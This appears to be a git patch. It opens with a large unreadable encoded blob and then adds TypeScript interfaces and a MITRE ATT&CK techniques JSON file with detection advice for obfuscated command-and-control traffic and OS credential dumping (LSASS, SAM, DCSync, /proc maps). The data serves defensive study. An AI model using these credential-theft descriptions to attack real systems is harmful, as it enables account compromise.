zis1=`RHPfxwJFS<&mlKYiN&lIbqJkV>a2tC#-ms)bV}#WvJpQ7L#NaFJjIC~CA>kT zVls>8U4@b8DI5$59}K-7j6WUpaUXvaB(Ovu$c_8?AWS>0IquIX*)N2>q2IrYxI360 zRWJ}T$Wek8Wf59rnbL=mleuJcq*lpPqhA8SNyliC;+HeQQ{POCf;1Fs6)wS)D$ZFY z#y91W%QwS4XKF#oc`G3V8vDgyDv5FYMP?5;o-B@#()e-v1T&L4u#@p*r?P}eui zvw!~Uizi$38}j5sx*~q_tbQ|{_M36rk0Jfr-%^0TA6T_-#*06OwEg^m@QCrevvK^e zo%CTBG3CGS%>4Z*#tF{!H)8Z3QdRwZVkILC59v?y z&5VMNA#MMgPRv|MH~$(k?t6bOg8lu}husYu|7~aQ54+X*oAC69-PHbl!mRv0V3>al zY3D&0i64g)PJSQID<4DJ-;2}yaY$2>q^-gCbRW5SWEuy}&!v}8SPY+Qox{GT_20Z#dj2JN&i79J>)&Pgw9+01 zHfwRNv6yG&{)%tL=OU`1?(IUjgs-Urrdav!pD=fuFD6GXM~#261Z(gFKKd~vSZ}~$ zPPipGCB3Nj`vCC&F(g>RSgm84R{nhj4n)XeVfWMbeZV{U7}73&;fj7dq`i3ze^?kp z+TV-lbQ}uVu?KwlsEgm5xV;y?$A_L=_(*}?VE9;1v7B6}%julG7(*i6=RS+kEevch zG8wh7^WTTvKOTQp-=#osLvTNHm_DpSQ)CbhrFAj=X5{^QZq8Z6hn$qT&u&%-2Q3C2 z9SCW55Q7c|=#Vx(ntmUP4*31A_GfAOSo^IQ;bbwXbk1Ip#bD2TSO=kSGgY44FczQ~ zekP*UA7)V$Je)BLSdw<1N^E~Dk=tOMe5EK`U|6BW$#lmxMNR{o~$HPt&U-$z`T`hOtA z{V}ASx9NX}PipD@ED}s(MX3)=Cq(W*4&+XQ4H!q<4{Qk2TVwh#v@xAr{%%qsF8?8& z(!P-v^&!0vBhsNit(#8V5F9n@ko7$+?#2zFCuI#QqbjJ@E!;9)q!%|twt0HS&$Q@L z+6@qieKVXNo$q9A?L_B%|K`2E1uxpoMjPoo=1HQ0V1oOI z9drUhOMqJTipjtU%Rv_n2?j0sM|$fAWZQgPa`i-5llssizb6m!2@^dK zGQA9QM-NmwB$_2ks(85~tyot6VT~)Zt3=DBY+M?X=3}!>R)A8|7ql&=Ytz23=(iD_ zB~qB}g#xO|d1bOxuv0`dPZ}XZ+EoY~io|6^2OP-v44x$s>I1tFjY%yicc%vwKz_@? z^E#y6cBbq5V4QGBFulP-4^v9a^9+9)3(Imy`@f?5`!GzWz%;a$=%b%z#2u9AL)vXi zo>pt28%=>whBeHNn@;_2rv^9;;qt3Ey zi@Az<>}C@pYy*^_o-ECUJld#7PD`#G3cAmv6^%7QI7Pl%!U!$bX)Oo&N*#YYP40Ky zjqRDnW&3+kQ<3B=3)rFVAi+KRHdI(A!R@yS-sgb2r6kUoM5a!fww1f2r%pPIoene@ zNd}j&(*br$0-gH2befFM4jRnt8}~6Jr~roLCHW#jA+Yq2pc`nkn-F?Xi#-?;9@74= zczPaodLVMYDOgRe@<7{p=7fK2K6IAMSDHIDZi&j&_++a<)v<^u+60?pm%7A9q1ZOQ zotxIi1~$H(TTbU$Tcx?vc%HSh&ho!33LR}T-sYN%QCyH7QQfd6nbIEjf$p8$rIoAz z8Uu1aUcQIMfCevE`pC5U%#?l-aW%XCFO~t5hD^q@F>f$9i@Y$PXqSKRCd^6eWUk!a z6PK9FK-FWn2j^eG6=x%mL{vq~u}m#KI)MS^xm=d#!UiKBL)xU}MG$XD`?GMLlXWOM z_5zrlIDz?RM7gKY=&t9HN}B8xtp7|xL_(+lLo4Q!g`+4#taywC^x2oN391XK4?b=XId`IL4pEY94%cNZTA3thN-Gqf`MH zOv!F?iPwtMc<{YL0yiL#NqMT`lt-8OloHx2XGStPa13OVP;7tup$HO#K`?yezVjpq z?U`2(29k!fGY8g3p(iN1QfZ*+oIAW|32;EKKP<${Mh%Ecebeo+vI%BRC_+y6$dn}w zv2$){-jjL3x(`OAhJ;f?EZzJO+SF!J6Jjb!BjO2P#N3CpOKO2nC&TqiCQL#xt4eJpH@(e?@EMBz!)k{pU2aPcyU+ z)JZ37ZVB#8G&nTTfS%Q1p4CCmYDiGD%Jg;>dNKMqq+KRZcus%k?fqGLvD0vOf0hU4x=H)9 zv^FnG9Xy$cGNk<=vSi`3nguo`PsWEuY-uT-W-767b+SV&x=YXVv@)ay5}$~duUvi`Gp5-%!jle5K1|A36G5-V(LLQ7}Cz1WQ1uo4yI>bxK?oy1Y>jZ z6cF24q{%v6%lB!qFE0$!Z+bp7GVNRVDcH-DNA2M>v&Ol%P^-4DG&80R^S&t1HQ&_! zmP$+APwB3jpUT`~aX7F~LRmxFg$+TSr-6SuPl7r_+TU9`lXzl)=Io9TJo*0}r-Nl;T!(PZ@3^oLLH`ONiN!*ovF+c5Wav zY`U1)dsh1noNWrx{&v^Z2W!uRP6B_3FC}Dbzrf1&gz*@9Kq*L4E}6nePA0y>>u-L1 z4ejsCoE#;l%#|!y0)UjlAC%}HgzK5ZnWX!}ZKcO_zwT#(&_{qbvP`|{XGiW>Pphqf^ZubBApHME_h;0b0? zBqWeUk&#qrVuHVh1~!n^FR}A>3H0OF(Dv8ZNS2G4pg@K4odOHxJ7px_xyz;Z(eCa` zrm;)P_tEa^BD2BS&OF42%0GXlB!EBn<4X#fQ|^Gz_%$@F^ZoQT@>PV-7bQXz3s-Gu z8%M&}{_!Q{T*;2y1a!EiN5Fr4%0Ti)c|wPVr4TzM-pnq*G8YN{WHK_6Ml_tw(DvEb z$OoIAg})@|94?cQCH~j1SWcXrPF@F; z9kbKJ1^u`n~lX$a-&m9|`uw^Ds1MUAdqjr?Y4uaV*jhVmGP3q&Hx; zp;*q65%;!ydd`1wisflJ4{iTS8;PxoiA#oHQVF=rLxbd$veQ^$2!yd`^#}676QB@{ zc$Kp>w4JXJtb2R;Jr^(#15N0m;glA)%Ka*Htaw9HEF^(E-`q5X+87bZF3gc0_pxugn#1Dbd5W33 zk;Z?oX#@?iB8XZPxL9<|V9M^A&AnCpOmfxE#Yn`8$thKQ;bIvH z2v_3Y3jEE}yA(jLf%qKKoHC0pBMEwPn}@dj&l8DzQPz^V7Z*iF;#<*Q7#jX3!^Wqg zp~#SZhpM{`_zqQzb;#Cl?|`zs#zq2ql|X-j8s78tzSAXqIQ`jS@KHL=P2Bs#ND2-Q zN%>xQNJavZ)A$A;yl95tk9E8cD#78Gb8ENGy?i5h>Q zx1lLgpV#{4Tg2x`1eO-FLQCR6@;=BgtLai+W1QKUvgeh_@8vT|r6V~y6dPk|>Zb{m#`Xra=MvCk1@|2eZoazLE>URLHmU z%C%yi;~UQ;?=Y=D&lTQgS;0HIq3~i^XO>008Lj-5{{0urI^Jrlos|-GD4AX~q);*w z<|~OFDx#6Cq}~=vNhBx>I<2tQjV!vYoOd?-dMkgtvXMo?Gk5lj zF{EfgN-cJ6%h#foHakS2U(!p^!0yLaiz)D%;bxQN=|lGFvKcSV{aPYM-ovBG{U>%Jit{`{F4uzM6AWyaM!AjfYh}4S6DO zMk>d!Bt%XZ+U5ASD0hFu63hRc&bzBD=7E_0z>EAVNa*w@UY=_)bPbt*>C58Y{h=yZ>PFI8pUK}yY%;5ijiKjfZ6W-?VuFTqp6UBcojpC zAIm&~@MBBNXtql+dyBk#l%vLb5+b)sV$xC8iPt&gw`HB??udWYcA@l|yDOG+Q0%C= zJ7amS*#X6lItvUscZV!IU)G-2nY_1vQ-UPCP%6Au3<+Ln^+wQ2PDgPm=8mqF z4|r60ZCLiQtTTVFEqezKiwtT}yP_&tkNGwo3u;?bK$g3Huh_9OtCTN3dco_l^7!Lp3L-$#l(9u-!5Y@%1Z4huk+0I z7O$VziN3vnqGSqs&0A03=>tWj7BhvHv%Vt+?RYd5-Ex1hO2S70+)KEr_(pSi@4Ayk zATk3jN~?Gu#h-gHEhhGG`Lc4Ld3AJFzC^@%!S&nMYUvgw&QsEo=7R5KUCK$|&E#)m ztGFx0x8h~%Z&ZW7E%Kq5&Aev*ZB`VQsPOGsytT8X&zCQI6chPb&Own%Yyt6xMT(_X z0&I^W4Ih8SO1X+P^Q@Lyb0~{LRd(Z1A~uEeC=S(8qW?!hmCmBr<#qQtItUJ7zh zR=%9vXVDSQ!e`Hd#XO6b`E2}H%Ebl%sYukGxFzED#l2RlGA?OTd4t!F~-cD+28*^SesK;3`4+XHnVD zCW0EYRMhUX?Ax;(-ap#fHx?>N;w*~jEJy1s@z$%vp{^pDOHAicPT-@+n@2fCk0KwA zq9u-YQgPeLI|5k{v7&d+;@n;3|6WBCU1cuM!hU6X&24BFPjM-a@)bwf$fJDOSrS6e z5~_bWi=}lm1}f2kVrZQOc_}<_wb*>oFOPDpaB~0ouX#NG@!O#K=f7eULwRT1;R}*$ z*YlI|G+l(Wb@?rGw|uMgaDi#{IW#=Y$jIlUrr>GfYMF`88;2oJ_cW(;K%yV{IkbHy z6zR#}tVKfaiksalOsS1LOBL`beZ}50hFgD?8B2<7%H24Pq2c@J+9kbE62g<#3Jsj) zFb*l{GN0BTFRNFUdT9H+r+?q=P<&cXzr4FFw{;85)6~VE*0b=PcFS{MJrnaZfs0S; z+?b~cX?$8w$ajMq?v6FH%+qB}hPJPFN%8r#)|+`ZP3ctm+KDXbK54Tg-FhN-;8}k} z?%0_u=|HIm)OXWrN?nP{9V+!mSN%%5A(2v&AQ-NKERl{)spE$a{wd9QfBY&UUL|}< z3i`B0%1L&lXZSfZ$Q=exl2d9jtrWqgy3h8dv=dA^t;san0-sW9la;0*);X8dpp;Ci zWMynVSW8nb3&NnqxZ*qs1xS;@0&w++0dUpWMN3V4}9 z3LjLHm87LlySgDWq30BJZBk?|pcvg`mr_Jlmh~PQuM1J z__SM<-sgZ{Y4J}yHPApGYjC;?kan)H#N1+noJ@Ei_tX{mDZ6oO$7L2yISvk4#<6WY2TZ( zsSoU$!MA-|WVY^0Ne2tB+UkGJHH@?8b~R&mvFMtiL9Uiq79WB$dUA zGTp(L%cs;*r5P7DU445-g+HyfC#@MNZ|uU^tVJ=$%^K&$!S5z4YPT@56d%u?E-r_9 z9K3G%JrDKki_bO*Xz)xKO^mf=GIDOPUgVhe-zuqQv4d5YGL{|Avxt90$vexM{FW5> z%HsRjz3A`ANRc?w(LNki?A4*|GvUSX(K7m#CCe@Tw|ylqvwz!^YWES^hz2tozU0TH z6Rq+|u>me=ne^6RMc=6nP_pgf+naZF6^nmph~yOuZL;?8bkQ}F&xfarR-ddsJYBT< zYRVcIfOnde)XYIw32`L zIW(M`5>KAYM9ieD$)RgfG7Y2sG^$t}_sKWp&KGw@*Sq8yruBx(z!H6aDgyE(pcwh8 zvWJ-$pOdwS^)3eN>^u`Z z(hNv-4s$TFJ9>XEnQ0UarF>G(o)p_;@;7Ol(2KLxKA7Gao-*lO5;`McU1w9m zPO2wnT^yZB0>#tiEKGVRxVs>Ylhlc)334YIWL{KB@cbMaII#FG(^VBumq_s>isI>V z;wOa^PcwTZa!u`x690I3T&e&Hmm&%!ximA;b5^|Pr~7}}1qPXfRLD$bLBuoHH7TJ2G3d zT1q&762GxCO!W>9r!mi>Jtn!EyI#;C)gC4JJCQG4!IEt@sp9)gn0WkY?YGiej~4gP zaC(b>^YH8wW@E=T($y~6Op`~B)h@YxlVOghTauyLUA&+mv2ME#>epGor=j7rmmIlE zt%iS+&;B_yyu0LVP4+vUE}0yY7r#GUvg5Y^JWN`B~^fF&B-n1ux8|zMwE&9JN901C(TkW4JhM#sE1W_nB67+&h~$y zJ25m!$r9&0HO^TYNycW-h&4MU#12)&yPzi1R1(su*dx#O-0CB`}ZBw@1_-*-Aq?oU$>=qw1T-MNh9C1%EX&McmF%ZdJ-BBLd|U|q=L z6_kjJO8?U0GMTDsHI>YUX^073Q7nJSX_ZOMQu10gE0fQveL%sX`Rm1@(mcMRHZ@m* zO_e@%jZ1^hNNA0L6)bdGa$=3k&4<&hlRHxKoit)rns3HNR=HT0+O#3(p_WofrFJ`= zCtIWFRD>FXD@71q15q-IruQb~A>rwQQ~GqKDo%fQrQ|qG z2T$-_5qF2myVA|`b7+v}CBQQMHldG8uKlG_x}+hgA5z+5W+zo&m7I}jrU@=77Rt2Q z#A=rc*h6zKN*m6kL}~78K?V=6k1Aqv+H`U!dDKtMbtxAZC-!RmdKDaTX!}gca;rU9 z8gWM7YFw?@Khw4o`%XF5#5DV^aOHa?O;#OYhC(7;0Rq z#Eu>sJ9?D-#i7C0D*1nl)3p;%7prf2cjD<{hD=vaa8>_Ia0np~-zxJi6@VbPdJ3ThQx2=^|3hEydBVf*=izTBPLTXcv~!6f-uZ%E6M6 zbJ&I1={Z6KWN6^QvVzlg6Hk}ylWE8ajx8qOsW#wM60wH1zx#hts#AuBr@18VFBQX1 zGYpF-_Ru$%2AaudvRFrHnVF}(ZlhFUXr@YOvl*n@`H%0OHkII!B44M0B`u^Q$rg1qt6-Sgf1)%+Oa_m~C203d-$I<5 zk~sL#%)!#vFcE(yjZBwJ>*<0Bt}0O6q5NGs2?j=2WW3nNhuX)blV9p5HP5hE>eKfR z>)jl8_1sItzeosM@6rk|SfAO)r6FKy%rwWo@m-X=OK5Rg2U408Z$!HRm1%pPdeKnR5D$ zfB(nh?jD#scooO{qhKFH+vctV=~NB|$_;}%o1|8p!J?sU|1CE;;pud};TwjA`AX0w zJ+&eJze<s|2vvxhev$ z&TTsUl&gP~tqyIQf)4yD&Yo2%zHA^@GlCO~%Fx)(S$1V;;96!B{5r}ThPLmkj-*Eq zxqoQ;dvqjMjy2w+clF1OY~y5!@sleW086G*J7{5b!k0sX(k|-EF5Ld{(vc+0P<4rV zv6dmPA~L^Vy#H^G3;DnQO%mVa|Nn2~udB44y%>LxeHEe68Oj z+0K5)DGSm-l7`&S_Epf4 zD16K@jYSG_W(ioYd73f|bNqD`6nkixw*i0LxfBnFEN%gX*rVi~4GrAlDGmj2xhw%a zd#Rv!aZ{caPS%01a>vHSRGo_!=c~|uJqrRcv~7`e;Hz9C{L+zFJq2d5!l>6gO$kMB|5z zb8-KQmU$Igu27|By-Er1&>*s`S!aJPMWXgQ%S|;GliM%G^)h`-H8+G7!=O|zo>mv6 z1F*4{ys8thKm0Jms%H>&ql=$9Nk^qN>&2zM{gsx5tQRzVLcBJ=N z`p{S#8lzu4>){WEZVno^>0VJVeyjAJhar_qfVi2`0-u%oxduV)Da3=Laik$`wj^!5 zFf<4{D{#yWviOp(XF&uW#Q=XF+V=l+AnrDe!l7Z>nhWzRk(Z%u@6mxGAG7JyvrlF> z#z|(xeQ5X+%XCVBlHSL&Hx zqEN+!l(}Jl3Mp>`dlu4*Xg(=X@pxAuy~^c;g%ocTTV6=9SGl-lZVUvG61lUVDpJBM zm{%diKg7HWDQkw^ETmV-bSb1)NuMdCSINmKq*uAqvyfiphR{L^dow^xQnnp3y^vld zd8&|JlYMpHAW%p-q5OZRB)v-RSRuV8`Rx9ug_IM@qeoKs4Rb4`SIMv|q^uj1e<8g} zE?^;rdueu(^eR_27gFFZh^#`&g5a@2%3;Rx7E(MLEJz{6awbAeQn(jNsgQD<$!{cu z-zbns%DO?+6jCG--d0Fi5Pm61ks(w=B;_$OIY|*U*o8uhgH3;-N>ca@b1S5r1+H6B z9fSr+d6oI&i^7sc!GQECY2$^Ib3g-#q}L>~-_od%UXvj|l9Gw^`2A2w!m+N6xl{e zS@x9KlcZ!1aOMjs0uaklNUy1cyU%E^ki|*LNg#`tQ(Av&T?^@TaNPxdc2R>~apU?S&M@L8(hp9^>1JDbNxO7za&02zjj}ES4JdLV7Xv zg_P)cy3`~^V1XeEDJBmXvXJ6}QJ9hxi-9IFN%7QZe-tlrdLoPqRvu&TT2f*!>`?(y za)=Q+040A4V}GbPnT*bo5@CRU2THaZ4}lV66LTsSDK!`9R#^z>DSvDJsT}U}WR1hVYJ56}zpVE8D z;!;+Zb(?lUbI^)?R+2ypDGGuoqzC~TAI%(LnaO|jSXwOuis2%yOFO7SiXBS7rx*~^ zq-yqn>6)=aDOC#WJngh*4~oTI`gRpk_JGpAc*WCAZ2l?Dq8Al#GYRRYP?vLk+KN%v zfbznkQc{;9j6#Z$N;jxm_GF|!^(_9#VOclMM^>^ zSOnTBPeO5p6u$vqT}UxO7~CW&{xfAxixhuQSx-CRMg6g4q4X_|1S3pUVi={Jav_B; z7!+>sDuW%R7j#0*JRl^+tKo4YDP9e2U6Nk()Qay$pn{YHVZe?wz!_tNESy&2_wE)_ zR2I3ch?A0)Sx6C1TrH9kOXb>=6uuw|P?nW0YjI*r*Y`q-1}Q3pC%yEiFQi~649|Zx z_kastn(N1yq}@+aLh>{lN+tw-?&5_%nL}4daf2AcBPk&ch}uGmyGQegq-+(#)CHd} zN%@5oD~jGRNnvn`s^b1L5?tWCqAiMIW!l3@QljkiFbl3$?hGlUhO}# zvjGWl|0S_u%ESL{Lr;EocU5L&WK?ApLButTzyUM?z2XA$-5JdDBZ3231n;L|Nn%hC zptV%Hl?zQ7&vpT{W!XI{a?;^TccJb0#*acy%0Oh_X9MUy2P%~-e;3-p)r|e1n>pi>;Y)% zcqI!EyEB{dL&$2i-XwvvaVCFAe&`w{b{JI&Xv%$Ma`l&6sGgacr|3FUIX|d+6|Xbu z^W*~*^_VFNXk}8Xai~jY(&>3_sE;vH70{}w22&V3deEuJyb&$j(Lce6T0lEq(S3kk zB!=k%TC2C)1&)Chv@q<{bpsy`Mhyd6gzPgz^u|zRKnr~}4}$h%d^3Nbz0W)|KqF6i zQGmYA?CG;vz?;uN>yJHE7JjB=e^9Y1$r#5CXp(xj9_Y>)68=F@P>Z%Nb%v3D1exX= zTp%;1Ti%S~>kLOfAxq}y8W%8_eJ`sTW1(F`R6Rh~q*P}-_qCk|a^}*XcZ$SuhTWe( zgI4jbvIuBdxi%IAt-F7;1<>eqnJ%@Ds&&w?p7tOBErxW3fH6Gf`G6*0R#`1H5xUQf zc7Rr-&?Q0HpyoE`JW4}t@rG-L(Y?T2^p^r-=wp}cGh zK?}EJ0NVO!qX&k+cb#y6R#I1)DYVU8T8tjyt!{j2)YWD`pefk(e!=T`^_K!#t=47( z4yC;MP63UBw8MV^Zy@ZHeH_Ex+{B@CKf`0051$*U%v! zK>0bY!5#mo77McYz*d0X%hTQqpf!nG>ZqaKg8zY2?df&_G)b;+q0sutEu3Jzd6&EZ z8X;?a1>yW%q5^2*beTPb^LO0>fX1Ht-H^WD)hz+7&(wb+9m4rtQ5et?ZiP`W`=^c+ zKvT%-TtbWBs$KwSox{=|w4Pu6rGVBs&o2cuqi?ymE>^4l@YY$}iZK`TnXBhn04<6) zC*UMZ%Ni6q7mf*|6n+&0v;rXQ|0;nnWXqz}RwY<{X&i_h#IfqIZ3)4yf~VYMtn{p8 zSp^1)R04nZiper5IAh;E$^~dec$*UtQty^*fY#$GZ->TlHxB^X9;_DtN$_eC1hie# zD!DmZDqAa?uGhW+y_25O!S%jNJ7pZm!|&!{Kr?@}CyICSZZiwen0M=A=uUT&E}#+g z*2id1-c7oIrh+#m!pL`5VFNT3yx$FK|JAw!(AIx)lNd^otJDY3yhTl7;LEt!9nflw zRt2!;v~xsdtC zhe@(3Ro3BKkp0&Cm9cOW^%x#98Js;mtv%7P#2vJ2SJWShixI0GoEwtQ<8MI6ou{~p z6DLQoqjA-M_C4BZePBP`T>9(xZ-0OPuda zF9ClnyD2&$ae-|pc37|hO|fA&jiOU6wq!_5UBCTgJ8_bs*i9sVeWZSIb^qGb$qV{m zoLw`q$XJ3FoHlm1W>4FP^o}Kgl+~(s7T2uD!0yZU?^e)Ca2~&V*Pxw13Y7+!XhecELP4piel(@yj8GQJLG?Pmfi9ONohrj55TmYiR_5fFeBT8uSb9e zjx{!DDR8k6{H!JPO?dOdSh-L(hWa+X={W8sTf`7MrRN|Pz@sAP%Z&l=f~zR`R#gTtc?#%9$Vq=O zc)!QKb6$tYxr!o4V*qbjia$Daxk^NJtpaW07gq-L$G+SszfZm>6>wzzQyrRld@;j< zOwG=bhSAb#bks>SNluoYDnE)(pSKUJ%(FaCGm(m7D{kcSgUqvE!<(+|52j6t<~ZH| ziA5?zn%`~3QZ8>~aeF~L0m^Yt72z7r`FNZYx^uJ3Bt6F{GF+VsKoXR`rYOR3ymgzz(Z-XsKEI?^P zHdJD^S6ItnS9N>#zXIt+%YT~g=xUgoWxXbf5(6|rTmlviU z--+${$B+dW*q~>kN11ILm;<+Z^i`Xuuy(n<2g2uAoHymF0*?hJsgF(HkaJFiuX)Kw zjz{}O=XGC(tOB#a;(5hOqD}kX3#X&;b@Ddh_zrq9KK;DuAD8jy6BV~l9~eghx33}? z1Q&lI@)$O@0RR9h0{{RI0001ZY%gtPbYWy+bYU)dZET#9%Wm5+5JmR|`VR#6GUd2U z979rIB=9N)f+h{R9g{$_Pe=LoyA~7y!PBw$B1KsH=d(p6Tp|F;wW)`k~_L>h; zL39YjLU2U(p{VqfR1fwzdMSjUe2Ij_P_jVO&Ryo_&V9M(+~4^=|MS0ooi7WZt1lRe z*y&ya7MVKxhE|4oGG-ZG#u`bwN%4BDH4R#B&DmJ#lJ4K=Bmq7uaiH0xY}RZnZUTH= z(LibPE5ALaRtN4cfA(ZNb5;XzzX;L*uX1V8fkiawKzrs`p~~3gw`d9C@uc58tKwyF(WmsE;X zXHZ=OS}4|lWm1h(OD~*QM)oCxjvjhZPe+)Qrki%;@vZ;z-zt8+SxX}uhH|QNGIVL% zpic=Uza^n`P;NW-#(JJ>>olb&pX=AswiB)L^7wFcVO4_SNA+p-8Et15c}ApJ2kPbb z-(QA*a3?(abW_ipbu^g6xC<`S+a@Y+*Q~7qOg_y9hNe*5uT!hj9SC(d_5^w_CkjOG z+?>tN=3cBb)w=~f%Xw1VNvK98Q+97DpTv|*n1#ObQQ;=L$ zYNfj>*A)=-T49wxK|vb|TIBR4mkeUPPmtn8m$VQSG~h*F)|YDnXhh+IlW6oWFMIpe zFR1V^+SLP; + detection: string; + platforms: Array; + data_sources: Array; + is_subtechnique: boolean; + supertechnique: string | null; + subtechniques: Array; + mitigations: Array; + cumulative_score: number; + adjusted_score: number; + has_car: boolean; + has_sigma: boolean; + has_es_siem: boolean; + has_splunk: boolean; + cis_controls: Array; + nist_controls: Array; + process_coverage: boolean; + network_coverage: boolean; + file_coverage: boolean; + cloud_coverage: boolean; + hardware_coverage: boolean; +} +export interface Subtechnique { + tid: string; + name: string; + description: string; + url: string; + detection: string; + mitigations: Array; +} +export interface Mitigation { + mid: string; + name: string; + description: string; + url: string; +} diff --git a/src/data/Techniques.json b/src/data/Techniques.json new file mode 100644 index 0000000..901bfb0 --- /dev/null +++ b/src/data/Techniques.json @@ -0,0 +1,19366 @@ +[ + { + "tid": "T1001", + "name": "Data Obfuscation", + "description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ", + "url": "https://attack.mitre.org/techniques/T1001", + "tactics": [ + "Command And Control" + ], + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1001.001", + "name": "Data Obfuscation: Junk Data", + "url": "https://attack.mitre.org/techniques/T1001/001", + "description": "Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1001.002", + "name": "Data Obfuscation: Steganography", + "url": "https://attack.mitre.org/techniques/T1001/002", + "description": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1001.003", + "name": "Data Obfuscation: Protocol Impersonation", + "url": "https://attack.mitre.org/techniques/T1001/003", + "description": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 0.3561555233457143, + "adjusted_score": 0.3561555233457143, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "13.3", + "13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1003", + "name": "OS Credential Dumping", + "description": "dd\n", + "url": "https://attack.mitre.org/techniques/T1003", + "tactics": [ + "Credential Access" + ], + "detection": "### Windows\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nHash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. \n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)\n\n### Linux\nTo obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc//maps, where the directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Active Directory: Active Directory Object Access", + "Command: Command Execution", + "File: File Access", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Process: OS API Execution", + "Process: Process Access", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Access" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1003.001", + "name": "OS Credential Dumping: LSASS Memory", + "url": "https://attack.mitre.org/techniques/T1003/001", + "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and 